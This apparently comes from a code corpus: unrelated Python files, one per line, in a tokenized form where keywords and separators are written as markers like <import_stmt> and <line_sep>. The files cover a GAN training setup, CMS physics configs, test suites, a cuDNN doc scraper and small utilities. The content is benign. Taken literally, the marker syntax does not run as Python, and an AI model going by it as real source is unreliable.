sample_len=sample_len)<line_sep>discriminator=Discriminator()<line_sep>attr_discriminator=AttrDiscriminator()<line_sep>checkpoint_dir="./test/checkpoint"<if_stmt><not>os.path.exists(checkpoint_dir)<block_start>os.makedirs(checkpoint_dir)<block_end>sample_dir="./test/sample"<if_stmt><not>os.path.exists(sample_dir)<block_start>os.makedirs(sample_dir)<block_end>time_path="./test/time.txt"<line_sep>epoch=400<line_sep>batch_size=100<line_sep>vis_freq=200<line_sep>vis_num_sample=5<line_sep>d_rounds=1<line_sep>g_rounds=1<line_sep>d_gp_coe=10.0<line_sep>attr_d_gp_coe=10.0<line_sep>g_attr_d_coe=1.0<line_sep>extra_checkpoint_freq=5<line_sep>num_packing=1<line_sep>run_config=tf.ConfigProto()<with_stmt>tf.Session(config=run_config)<as>sess<block_start>gan=DoppelGANger(sess=sess checkpoint_dir=checkpoint_dir sample_dir=sample_dir time_path=time_path epoch=epoch batch_size=batch_size data_feature=data_feature data_attribute=data_attribute real_attribute_mask=real_attribute_mask data_gen_flag=data_gen_flag sample_len=sample_len data_feature_outputs=data_feature_outputs data_attribute_outputs=data_attribute_outputs vis_freq=vis_freq vis_num_sample=vis_num_sample generator=generator discriminator=discriminator attr_discriminator=attr_discriminator d_gp_coe=d_gp_coe attr_d_gp_coe=attr_d_gp_coe g_attr_d_coe=g_attr_d_coe d_rounds=d_rounds g_rounds=g_rounds num_packing=num_packing extra_checkpoint_freq=extra_checkpoint_freq)<line_sep>gan.build()<line_sep>gan.train()<block_end><block_end>
<class_stmt>DoesNotExistException(Exception)<block_start><pass><block_end>
#! /usr/bin/env python <import_stmt>unittest<import_stmt>sys<import_stmt>xmlrunner<import_from_stmt>pyinfraboxutils.coverage *<class_stmt>TestCoverageMethods(unittest.TestCase)<block_start><def_stmt>test_jacoco self<block_start>parser=Parser("data/report_test.xml")<line_sep>parser.parse(<none> create_markup=<false>)<line_sep>self.assertTrue(parser.files[0].functions_found<eq>2)<line_sep>self.assertTrue(parser.files[0].functions_hit<eq>0)<line_sep>self.assertTrue(parser.files[0].branches_found<eq>2)<line_sep>self.assertTrue(parser.files[0].branches_hit<eq>0)<line_sep>self.assertTrue(parser.files[0].lines_hit<eq>0)<line_sep>self.assertTrue(parser.files[0].lines_found<eq>3)<line_sep>self.assertTrue(parser.files[0].name<eq>"HelloWorld.java")<block_end><def_stmt>test_parse_dir self<block_start>parser=Parser("data/")<line_sep>parser.parse(<none> create_markup=<false>)<line_sep>hello=0<line_sep>hello2=1<if_stmt>parser.files[0].name<eq>"HelloWorld2.java"<block_start>hello=1<line_sep>hello2=0<block_end>self.assertTrue(parser.files[hello].functions_found<eq>2<times>2)<line_sep>self.assertTrue(parser.files[hello].functions_hit<eq>0<times>2)<line_sep>self.assertTrue(parser.files[hello].branches_found<eq>2<times>2)<line_sep>self.assertTrue(parser.files[hello].branches_hit<eq>0<times>2)<line_sep>self.assertTrue(parser.files[hello].lines_hit<eq>0<times>2)<line_sep>self.assertTrue(parser.files[hello].lines_found<eq>3<times>2)<line_sep>self.assertTrue(parser.files[hello].name<eq>"HelloWorld.java")<line_sep>self.assertTrue(parser.files[hello2].functions_found<eq>2)<line_sep>self.assertTrue(parser.files[hello2].functions_hit<eq>0)<line_sep>self.assertTrue(parser.files[hello2].branches_found<eq>2)<line_sep>self.assertTrue(parser.files[hello2].branches_hit<eq>0)<line_sep>self.assertTrue(parser.files[hello2].lines_hit<eq>0)<line_sep>self.assertTrue(parser.files[hello2].lines_found<eq>3)<line_sep>self.assertTrue(parser.files[hello2].name<eq>"HelloWorld2.java")<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>s=unittest.defaultTestLoader.discover('.')<line_sep>r=xmlrunner.XMLTestRunner(output='/infrabox/upload/testresult/').run(s)<line_sep>sys.exit(<not>r.wasSuccessful())<block_end>
<import_from_stmt>bs4 BeautifulSoup<import_stmt>requests<import_stmt>re<import_stmt>sys<import_stmt>os<line_sep>inputs={}<line_sep>outputs={}<line_sep>ios={}<line_sep>docs={}<def_stmt>get <block_start><if_stmt>os.path.isfile("cache/docs.html")<block_start><with_stmt>open("cache/docs.html" 'r')<as>f<block_start>print("Using cache" file=sys.stderr)<line_sep><return>f.read()<block_end><block_end>r=requests.get("https://docs.nvidia.com/deeplearning/cudnn/api/index.html")<with_stmt>open("cache/docs.html" 'w')<as>f<block_start>f.write(r.text)<block_end><return>r.text<block_end><def_stmt>main <block_start>txt=get()<line_sep>soup=BeautifulSoup(txt "html5lib")<line_sep>contents=soup.find_all(id="contents")<line_sep>ids=["cudnn-ops-infer-so-library" "cudnn-ops-train-so-library" "cudnn-cnn-infer-so-library" "cudnn-cnn-train-so-library" "cudnn-adv-infer-so-library" "cudnn-adv-train-so-library" "cudnn-backend-api"]<line_sep>topics=[contents[0].find_all(id=i)[0].find_all(id=re.compile("-api"))<for>i ids]<line_sep>topics=[t.find_all(class_="topic concept nested2")<for>topic topics<for>t topic]<line_sep>topics=[t<for>ts topics<for>t ts]<line_sep>#print(topics[0]) <for_stmt>i,topic enumerate(topics)<block_start>rawFnName=topic.find_all(class_='title topictitle2')[0].text<line_sep>rawFnName=rawFnName.rstrip('()')<try_stmt><block_start>fnName=re.search('cudnn.+$' rawFnName).group(0)<block_end><except_stmt>AttributeError<as>e<block_start>print("rawFnName: {}".format(rawFnName) file=sys.stderr)<line_sep><continue><block_end><try_stmt><block_start>paramsDL=topic.find_all(class_='dl')[0]# first definition list is params <block_end><except_stmt>IndexError<block_start>print("rawFnName: {} - topic has no dl class".format(fnName) file=sys.stderr)<line_sep><continue><block_end>#print(paramsDL) # check previous #if paramsDL.previous_sibling.previous_sibling.text != "Parameters": # print("rawFnName: {} has no params::: {}".format(fnName, paramsDL.previous_sibling), file=sys.stderr) # continue params=paramsDL.find_all(class_='dt dlterm')# name paramsDesc=paramsDL.find_all(class_='dd')# use type paramUse=[]<for_stmt>d paramsDesc<block_start><try_stmt><block_start>use=d.find_all(class_='ph i')[0].text<block_end><except_stmt>IndexError<as>e<block_start>use="Input"<block_end>paramUse.append(use)<block_end><if_stmt>len(params)<ne>len(paramUse)<block_start>print("rawFnName: {} - differing params and use cases".format(fnName) file=sys.stderr)<line_sep><continue><block_end>inputParams=[p.text.strip()<for>i,p enumerate(params)<if>(paramUse[i].strip()<eq>'Input')<or>(paramUse[i].strip()<eq>"Inputs")]<line_sep>outputParams=[p.text.strip()<for>i,p enumerate(params)<if>(paramUse[i].strip()<eq>'Output')<or>(paramUse[i].strip()<eq>"Outputs")]<line_sep>ioParams=[p.text.strip()<for>i,p enumerate(params)<if>paramUse[i].strip()<eq>'Input/Output']<line_sep>inputs[fnName]=inputParams<line_sep>outputs[fnName]=outputParams<line_sep>ios[fnName]=ioParams<line_sep># extract docs <try_stmt><block_start>docbody=topic.find_all(class_='body conbody')[0]<block_end><except_stmt>IndexError<block_start>print("fnName: {} - no body".format(fnName) file=sys.stderr)<line_sep><continue><block_end># clear is better than clever. 
<try_stmt><block_start>doc=docbody.find_all("p")[0].text<block_end><except_stmt><block_start>print("fnName: {} - no p".format(fnName) file=sys.stderr)<line_sep><continue><block_end>doc=doc.replace("\n" "")<line_sep>doc=re.sub("\t+" " " doc)<line_sep>doc=re.sub("\s+" " " doc)<line_sep>doc=doc.replace('"' '`')<line_sep>doc=doc.replace("This function" fnName)<line_sep>doc=doc.replace("This routine" fnName)<line_sep>doc=doc.replace("This" fnName)<line_sep>doc=doc.strip()<line_sep>docs[fnName]=doc<block_end># write the go file print("package main")<line_sep>print("/* generated by parse.py. DO NOT EDIT */")<line_sep>print("var inputParams = map[string][]string{")<for_stmt>k,v inputs.items()<block_start><if_stmt>len(v)<eq>0<block_start><continue><block_end>print('"{}": {{ '.format(k) end="")<for_stmt>inp v<block_start>split=inp.split(",")<for_stmt>s split<block_start>print('"{}", '.format(s.strip()) end="")<block_end><block_end>print("},")<block_end>print("}")<line_sep>print("var outputParams = map[string][]string{")<for_stmt>k,v outputs.items()<block_start><if_stmt>len(v)<eq>0<block_start><continue><block_end>print('"{}": {{ '.format(k) end="")<for_stmt>inp v<block_start>split=inp.split(",")<for_stmt>s split<block_start>print('"{}", '.format(s.strip()) end="")<block_end><block_end>print("},")<block_end>print("}")<line_sep>print("var ioParams = map[string][]string{")<for_stmt>k,v ios.items()<block_start><if_stmt>len(v)<eq>0<block_start><continue><block_end>print('"{}": {{ '.format(k) end="")<for_stmt>inp v<block_start>split=inp.split(",")<for_stmt>s split<block_start>print('"{}", '.format(s.strip()) end="")<block_end><block_end>print("},")<block_end>print("}")<line_sep>print("var docs = map[string]string{")<for_stmt>k,v docs.items()<block_start>print('"{}": "{}",'.format(k v.strip()))<block_end>print("}")<block_end>main()<line_sep>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("QcdPhotonsDQM")<line_sep>process.load("DQM.Physics.qcdPhotonsDQM_cfi")<line_sep>process.load("DQMServices.Core.DQM_cfg")<line_sep>process.load("DQMServices.Components.DQMEnvironment_cfi")<line_sep>process.DQM.collectorHost=''<line_sep>process.dqmSaver.workflow=cms.untracked.string('/My/Test/DataSet')<line_sep>## Geometry and Detector Conditions (needed for spike removal code) process.load("Configuration.StandardSequences.GeometryRecoDB_cff")<line_sep>process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")<line_sep>process.GlobalTag.globaltag=cms.string('START38_V9::All')<line_sep>process.load("Configuration.StandardSequences.MagneticField_cff")<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1000))<line_sep>process.source=cms.Source("PoolSource" fileNames=cms.untracked.vstring('/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/B81EF896-9AAF-DF11-B31B-001A92971BCA.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/886F398A-B8AF-DF11-91A8-003048678FC6.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/7830F828-87AF-DF11-9DE0-003048678FD6.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/26CC6A78-A8AF-DF11-97A5-003048678F78.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0017/3E226F93-7FAF-DF11-A908-001A92810AF4.root'))<line_sep>process.p=cms.Path(process.qcdPhotonsDQM+process.dqmSaver)<line_sep>
# (c) 2012-2019, Ansible by Red Hat # # This file is part of Ansible Galaxy # # Ansible Galaxy is free software: you can redistribute it and/or modify # it under the terms of the Apache License as published by # the Apache Software Foundation, either version 2 of the License, or # (at your option) any later version. # # Ansible Galaxy is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # Apache License for more details. # # You should have received a copy of the Apache License # along with Galaxy. If not, see <http://www.apache.org/licenses/>. <import_stmt>datetime<as>dt<import_from_stmt>rest_framework serializers<import_from_stmt>rest_framework.reverse reverse<class_stmt>NativeTimestampField(serializers.DateTimeField)<block_start>"""Represents internal timestamp value as date time string."""<def_stmt>to_representation self value<block_start><if_stmt>value<is><none><block_start><return><none><block_end>value=dt.datetime.utcfromtimestamp(value).replace(tzinfo=dt.timezone.utc)<line_sep><return>super().to_representation(value)<block_end><def_stmt>to_internal_value self value<block_start><if_stmt>value<is><none><block_start><return><none><block_end>value=super().to_internal_value(value)<line_sep><return>value.astimezone(dt.timezone.utc).timestamp()<block_end><block_end><class_stmt>NamespaceObjectField(serializers.Field)<block_start>"""Return namespace object for a serializer field."""<def_stmt>to_representation self value<block_start><return>{'id':value.pk 'href':reverse('api:namespace_detail' kwargs={'pk':value.pk} request=self.context.get('request') ) 'name':value.name }<block_end><block_end><class_stmt>VersionUrlField(serializers.Field)<block_start>"""Return version detail url under collection namespace and name."""<def_stmt>to_representation self value<block_start><return>reverse('api:v2:version-detail' kwargs={'namespace':value.collection.namespace.name 'name':value.collection.name 'version':value.version } request=self.context.get('request') )<block_end><block_end>
"""Utility module to manage meta info."""<import_stmt>platform<import_from_stmt>. __version__ __copyright__ __license__<line_sep>APP_VERSION=f"Telegram Media Downloader {__version__}"<line_sep>DEVICE_MODEL=(f"{platform.python_implementation()} {platform.python_version()}")<line_sep>SYSTEM_VERSION=f"{platform.system()} {platform.release()}"<line_sep>LANG_CODE="en"<def_stmt>print_meta logger<block_start>"""Prints meta-data of the downloader script."""<line_sep>print(f"Telegram Media Downloader v{__version__}, {__copyright__}")<line_sep>print(f"Licensed under the terms of the {__license__}" end="\n\n")<line_sep>logger.info(f"Device: {DEVICE_MODEL} - {APP_VERSION}")<line_sep>logger.info(f"System: {SYSTEM_VERSION} ({LANG_CODE.upper()})")<block_end>
<import_from_stmt>circus.exc ArgumentError<import_from_stmt>circus.commands.base Command<import_from_stmt>circus.util get_info<line_sep>_INFOLINE=("%(pid)s %(cmdline)s %(username)s %(nice)s %(mem_info1)s "<concat>"%(mem_info2)s %(cpu)s %(mem)s %(ctime)s")<class_stmt>Daemontats(Command)<block_start>"""\ Get circusd stats ================= You can get at any time some statistics about circusd with the dstat command. ZMQ Message ----------- To get the circusd stats, simply run:: { "command": "dstats" } The response returns a mapping the property "infos" containing some process informations:: { "info": { "children": [], "cmdline": "python", "cpu": 0.1, "ctime": "0:00.41", "mem": 0.1, "mem_info1": "3M", "mem_info2": "2G", "nice": 0, "pid": 47864, "username": "root" }, "status": "ok", "time": 1332265655.897085 } Command Line ------------ :: $ circusctl dstats """<line_sep>name="dstats"<def_stmt>message self *args **opts<block_start><if_stmt>len(args)<g>0<block_start><raise>ArgumentError("Invalid message")<block_end><return>self.make_message()<block_end><def_stmt>execute self arbiter props<block_start><return>{'info':get_info(interval=0.01)}<block_end><def_stmt>_to_str self info<block_start>children=info.pop("children" [])<line_sep>ret=['Main Process:' ' '+_INFOLINE%info]<if_stmt>len(children)<g>0<block_start>ret.append('Children:')<for_stmt>child children<block_start>ret.append(' '+_INFOLINE%child)<block_end><block_end><return>"\n".join(ret)<block_end><def_stmt>console_msg self msg<block_start><if_stmt>msg['status']<eq>"ok"<block_start><return>self._to_str(msg['info'])<block_end><else_stmt><block_start><return>self.console_error(msg)<block_end><block_end><block_end>
# Copyright 2017 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Tests for upload_test_result_artifacts."""<import_from_future_stmt> print_function<import_stmt>json<import_stmt>mock<import_stmt>os<import_stmt>random<import_stmt>string<import_stmt>tempfile<import_stmt>unittest<import_stmt>upload_test_result_artifacts<class_stmt>UploadTestResultArtifactsTest(unittest.TestCase)<block_start><def_stmt>setUp self# Used for load tests <block_start>self._temp_files=[]<block_end><def_stmt>tearDown self# Used for load tests <block_start><for_stmt>fname self._temp_files<block_start>os.unlink(fname)<block_end><block_end>### These are load tests useful for seeing how long it takes to upload ### different kinds of test results files. They won't be run as part of ### presubmit testing, since they take a while and talk to the network, ### but the code will stay here in case anyone wants to edit the code ### and wants to check performance. Change the test names from 'loadTestBlah' ### to 'testBlah' to get them to run. <def_stmt>makeTemp self size<block_start>_,fname=tempfile.mkstemp()<with_stmt>open(fname 'w')<as>f<block_start>f.write(random.choice(string.ascii_letters)<times>size)<block_end>self._temp_files.append(fname)<line_sep><return>os.path.basename(fname)<block_end><def_stmt>makeTestJson self num_tests artifact_size<block_start><return>{'tests':{'suite':{'test%d'%i:{'artifacts':{'artifact':self.makeTemp(artifact_size) } 'expected':'PASS' 'actual':'PASS' }<for>i range(num_tests)}} 'artifact_type_info':{'artifact':'text/plain'}}<block_end><def_stmt>_loadTest self json_data upload<block_start><return>upload_test_result_artifacts.upload_artifacts(json_data '/tmp' upload 'test-bucket')<block_end><def_stmt>loadTestEndToEndSimple self<block_start>test_data=self.makeTestJson(1 10)<line_sep>print(self._loadTest(test_data <false>))<block_end><def_stmt>loadTestEndToEndManySmall self<block_start>test_data=self.makeTestJson(1000 10)<line_sep>self._loadTest(test_data <false>)<block_end><def_stmt>loadTestEndToEndSomeBig self<block_start>test_data=self.makeTestJson(100 10000000)<line_sep>self._loadTest(test_data <false>)<block_end><def_stmt>loadTestEndToEndVeryBig self<block_start>test_data=self.makeTestJson(2 1000000000)<line_sep>self._loadTest(test_data <false>)<block_end>### End load test section. 
<def_stmt>testGetTestsSimple self<block_start>self.assertEqual(upload_test_result_artifacts.get_tests({'foo':{'expected':'PASS' 'actual':'PASS' } }) {('foo' ):{'actual':'PASS' 'expected':'PASS' }})<block_end><def_stmt>testGetTestsNested self<block_start>self.assertEqual(upload_test_result_artifacts.get_tests({'foo':{'bar':{'baz':{'actual':'PASS' 'expected':'PASS' } 'bam':{'actual':'PASS' 'expected':'PASS' } } } }) {('foo' 'bar' 'baz'):{'actual':'PASS' 'expected':'PASS' } ('foo' 'bar' 'bam'):{'actual':'PASS' 'expected':'PASS' }})<block_end><def_stmt>testGetTestsError self<block_start><with_stmt>self.assertRaises(ValueError)<block_start>upload_test_result_artifacts.get_tests([])<block_end><block_end><def_stmt>testUploadArtifactsMissingType self<block_start>"""Tests that the type information is used for validation."""<line_sep>data={'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'screenshot':'foo.png' }}}}<with_stmt>self.assertRaises(ValueError)<block_start>upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket')<block_end><block_end>@mock.patch('upload_test_result_artifacts.get_file_digest')@mock.patch('upload_test_result_artifacts.tempfile.mkdtemp')@mock.patch('upload_test_result_artifacts.shutil.rmtree')@mock.patch('upload_test_result_artifacts.shutil.copyfile')<def_stmt>testUploadArtifactsNoUpload self copy_patch rmtree_patch mkd_patch digest_patch<block_start>"""Simple test; no artifacts, so data shouldn't change."""<line_sep>mkd_patch.return_value='foo_dir'<line_sep>data={'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' }}}<line_sep>self.assertEqual(upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket') data)<line_sep>mkd_patch.assert_called_once_with(prefix='upload_test_artifacts')<line_sep>digest_patch.assert_not_called()<line_sep>copy_patch.assert_not_called()<line_sep>rmtree_patch.assert_called_once_with('foo_dir')<block_end>@mock.patch('upload_test_result_artifacts.get_file_digest')@mock.patch('upload_test_result_artifacts.tempfile.mkdtemp')@mock.patch('upload_test_result_artifacts.shutil.rmtree')@mock.patch('upload_test_result_artifacts.shutil.copyfile')@mock.patch('upload_test_result_artifacts.os.path.exists')<def_stmt>testUploadArtifactsBasic self exists_patch copy_patch rmtree_patch mkd_patch digest_patch<block_start>"""Upload a single artifact."""<line_sep>mkd_patch.return_value='foo_dir'<line_sep>exists_patch.return_value=<false><line_sep>digest_patch.return_value='deadbeef'<line_sep>data={'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'foo.txt' }}}}<line_sep>self.assertEqual(upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket') {'artifact_type_info':{'log':'text/plain'} 'tests':{'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'deadbeef' }}} 'artifact_permanent_location':'gs://chromium-test-artifacts/sha1' })<line_sep>mkd_patch.assert_called_once_with(prefix='upload_test_artifacts')<line_sep>digest_patch.assert_called_once_with('/tmp/foo.txt')<line_sep>copy_patch.assert_called_once_with('/tmp/foo.txt' 
'foo_dir/deadbeef')<line_sep>rmtree_patch.assert_called_once_with('foo_dir')<block_end>@mock.patch('upload_test_result_artifacts.get_file_digest')@mock.patch('upload_test_result_artifacts.tempfile.mkdtemp')@mock.patch('upload_test_result_artifacts.shutil.rmtree')@mock.patch('upload_test_result_artifacts.shutil.copyfile')@mock.patch('upload_test_result_artifacts.os.path.exists')<def_stmt>testUploadArtifactsComplex self exists_patch copy_patch rmtree_patch mkd_patch digest_patch<block_start>"""Upload multiple artifacts."""<line_sep>mkd_patch.return_value='foo_dir'<line_sep>exists_patch.return_value=<false><line_sep>digest_patch.side_effect=['deadbeef1' 'deadbeef2' 'deadbeef3' 'deadbeef4']<line_sep>data={'artifact_type_info':{'log':'text/plain' 'screenshot':'image/png' } 'tests':{'bar':{'baz':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'baz.log.txt' 'screenshot':'baz.png' }}} 'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'foo.log.txt' 'screenshot':'foo.png' }} }}<line_sep>self.assertEqual(upload_test_result_artifacts.upload_artifacts(data '/tmp' <true> 'test-bucket') {'artifact_type_info':{'log':'text/plain' 'screenshot':'image/png' } 'tests':{'bar':{'baz':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'deadbeef1' 'screenshot':'deadbeef2' }}} 'foo':{'actual':'PASS' 'expected':'PASS' 'artifacts':{'log':'deadbeef3' 'screenshot':'deadbeef4' }} } 'artifact_permanent_location':'gs://chromium-test-artifacts/sha1' })<line_sep>mkd_patch.assert_called_once_with(prefix='upload_test_artifacts')<line_sep>digest_patch.assert_has_calls([mock.call('/tmp/baz.log.txt') mock.call('/tmp/baz.png') mock.call('/tmp/foo.log.txt') mock.call('/tmp/foo.png')])<line_sep>copy_patch.assert_has_calls([mock.call('/tmp/baz.log.txt' 'foo_dir/deadbeef1') mock.call('/tmp/baz.png' 'foo_dir/deadbeef2') mock.call('/tmp/foo.log.txt' 'foo_dir/deadbeef3') mock.call('/tmp/foo.png' 'foo_dir/deadbeef4') ])<line_sep>rmtree_patch.assert_called_once_with('foo_dir')<block_end><def_stmt>testFileDigest self<block_start>_,path=tempfile.mkstemp(prefix='file_digest_test')<with_stmt>open(path 'w')<as>f<block_start>f.write('a')<block_end>self.assertEqual(upload_test_result_artifacts.get_file_digest(path) '86f7e437faa5a7fce15d1ddcb9eaeaea377667b8')<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>unittest.main()<block_end>
# # Copyright (c) 2019 Intel Corporation # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # <import_from_stmt>unittest.mock MagicMock<import_stmt>pytest<import_from_stmt>click.testing CliRunner<import_from_stmt>kubernetes.client CustomObjectsApi<import_from_stmt>commands.workflow.cancel cancel<import_from_stmt>cli_text_consts WorkflowDeleteTexts<as>Texts<import_from_stmt>platform_resources.workflow ArgoWorkflow<line_sep>FAKE_WORKFLOW=ArgoWorkflow(name='fake-workflow' namespace='fake-namespace' k8s_custom_object_api=MagicMock(spec=CustomObjectsApi))<class_stmt>WorkflowCancelMocks<block_start><def_stmt>__init__ self mocker<block_start>self.get_namespace=mocker.patch('commands.workflow.cancel.get_kubectl_current_context_namespace' return_value='fake-namespace')<line_sep>self.get_workflow=mocker.patch('commands.workflow.cancel.ArgoWorkflow.get' return_value=FAKE_WORKFLOW)<line_sep>self.delete_workflow=mocker.patch.object(self.get_workflow.return_value 'delete')<block_end><block_end>@pytest.fixture()<def_stmt>cancel_mocks mocker<arrow>WorkflowCancelMocks<block_start><return>WorkflowCancelMocks(mocker=mocker)<block_end><def_stmt>test_cancel cancel_mocks:WorkflowCancelMocks<block_start>result=CliRunner().invoke(cancel [FAKE_WORKFLOW.name] catch_exceptions=<false>)<assert_stmt>result.exit_code<eq>0<assert_stmt>Texts.SUCCESS_MSG.format(workflow_name=FAKE_WORKFLOW.name)<in>result.output<block_end><def_stmt>test_cancel_not_found cancel_mocks:WorkflowCancelMocks<block_start>cancel_mocks.get_workflow.return_value=<none><line_sep>result=CliRunner().invoke(cancel [FAKE_WORKFLOW.name])<assert_stmt>result.exit_code<eq>0<assert_stmt>Texts.NOT_FOUND_MSG.format(workflow_name=FAKE_WORKFLOW.name)<in>result.output<block_end><def_stmt>test_cancel_other_error cancel_mocks:WorkflowCancelMocks<block_start>cancel_mocks.delete_workflow.side_effect=RuntimeError<line_sep>result=CliRunner().invoke(cancel [FAKE_WORKFLOW.name])<assert_stmt>result.exit_code<eq>1<assert_stmt>Texts.OTHER_ERROR_MSG<in>result.output<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process("QcdPhotonsDQM")<line_sep>process.load("DQM.Physics.qcdPhotonsDQM_cfi")<line_sep>process.load("DQMServices.Core.DQM_cfg")<line_sep>process.load("DQMServices.Components.DQMEnvironment_cfi")<line_sep>process.DQM.collectorHost=''<line_sep>process.dqmSaver.workflow=cms.untracked.string('/My/Test/DataSet')<line_sep>## Geometry and Detector Conditions (needed for spike removal code) process.load("Configuration.StandardSequences.GeometryRecoDB_cff")<line_sep>process.load("Configuration.StandardSequences.FrontierConditions_GlobalTag_cff")<line_sep>process.GlobalTag.globaltag=cms.string('START38_V9::All')<line_sep>process.load("Configuration.StandardSequences.MagneticField_cff")<line_sep>process.maxEvents=cms.untracked.PSet(input=cms.untracked.int32(1000))<line_sep>process.source=cms.Source("PoolSource" fileNames=cms.untracked.vstring('/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/B81EF896-9AAF-DF11-B31B-001A92971BCA.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/886F398A-B8AF-DF11-91A8-003048678FC6.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/7830F828-87AF-DF11-9DE0-003048678FD6.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0018/26CC6A78-A8AF-DF11-97A5-003048678F78.root' '/store/relval/CMSSW_3_8_2/RelValPhotonJets_Pt_10/GEN-SIM-RECO/START38_V9-v1/0017/3E226F93-7FAF-DF11-A908-001A92810AF4.root'))<line_sep>process.p=cms.Path(process.qcdPhotonsDQM+process.dqmSaver)<line_sep>
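A hypothetical invocation of the job above (not part of the original snippet): the unconnected "xs" input of each configured op has to be supplied through run_config, and the input values shown are illustrative.

if __name__ == "__main__":
    result = datasets.execute_in_process(
        run_config={
            "ops": {
                "sample_dataset": {"inputs": {"xs": [1, 2, 3, 4, 5, 6]}},
                "full_dataset": {"inputs": {"xs": [1, 2, 3, 4, 5, 6]}},
            }
        }
    )
    assert result.success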
# -*- coding: utf-8 -*- <import_from_stmt>collections namedtuple<import_from_stmt>athenacli.packages.format_utils format_status humanize_size<def_stmt>test_format_status_plural <block_start><assert_stmt>format_status(rows_length=1)<eq>"1 row in set"<assert_stmt>format_status(rows_length=2)<eq>"2 rows in set"<block_end><def_stmt>test_format_status_no_results <block_start><assert_stmt>format_status(rows_length=<none>)<eq>"Query OK"<block_end><def_stmt>test_format_status_with_stats <block_start>FakeCursor=namedtuple("FakeCursor" ["engine_execution_time_in_millis" "data_scanned_in_bytes"])<assert_stmt>format_status(rows_length=1 cursor=FakeCursor(10 12345678900))<eq>"1 row in set\nExecution time: 10 ms, Data scanned: 11.5 GB, Approximate cost: $0.06"<assert_stmt>format_status(rows_length=2 cursor=FakeCursor(1000 1234))<eq>"2 rows in set\nExecution time: 1000 ms, Data scanned: 1.21 KB, Approximate cost: $0.00"<block_end><def_stmt>test_humanize_size <block_start><assert_stmt>humanize_size(20)<eq>"20 B"<assert_stmt>humanize_size(2000)<eq>"1.95 KB"<assert_stmt>humanize_size(200000)<eq>"195.31 KB"<assert_stmt>humanize_size(20000000)<eq>"19.07 MB"<assert_stmt>humanize_size(200000000000)<eq>"186.26 GB"<block_end>
# -*- coding: utf-8 -*- # # Copyright 2019 <NAME>. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). You # may not use this file except in compliance with the License. A copy of # the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is # distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF # ANY KIND, either express or implied. See the License for the specific # language governing permissions and limitations under the License. <import_from_stmt>kafkashell bindings<import_from_stmt>kafkashell completer<import_from_stmt>kafkashell config<import_from_stmt>kafkashell constants<import_from_stmt>kafkashell executor<import_from_stmt>kafkashell helpers<import_from_stmt>kafkashell main<import_from_stmt>kafkashell settings<import_from_stmt>kafkashell style<import_from_stmt>kafkashell toolbar<import_from_stmt>kafkashell version<line_sep>name="kafkashell"<line_sep>__all__=["bindings" "completer" "config" "constants" "executor" "helpers" "main" "settings" "style" "toolbar" "version"]<line_sep>
<import_stmt>sublime_plugin<class_stmt>SendCodeExecCommand(sublime_plugin.WindowCommand)<block_start><def_stmt>run self code=<none> prog=<none><block_start>self.window.active_view().run_command("send_code" {"code":code "prog":prog})<block_end><block_end># backward compatibility <class_stmt>SendCodeBuildCommand(SendCodeExecCommand)<block_start><pass><block_end>
<import_stmt>sys<line_sep>filename=sys.argv[1]<with_stmt>open(filename)<as>file<block_start>header=file.readline().strip().split("\t")<line_sep>contacts=[dict(zip(header line.strip().split("\t")))<for>line file]<block_end><for_stmt>contact contacts<block_start>print("email: {email} -- {last}, {first}".format(**contact))<block_end>
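A made-up input file to try the script above with; the header row supplies the keys used in the format string, and the file and script names below are illustrative.

sample = "first\tlast\temail\nAda\tLovelace\tada@example.com\nAlan\tTuring\talan@example.com\n"
with open("contacts.tsv", "w") as handle:
    handle.write(sample)
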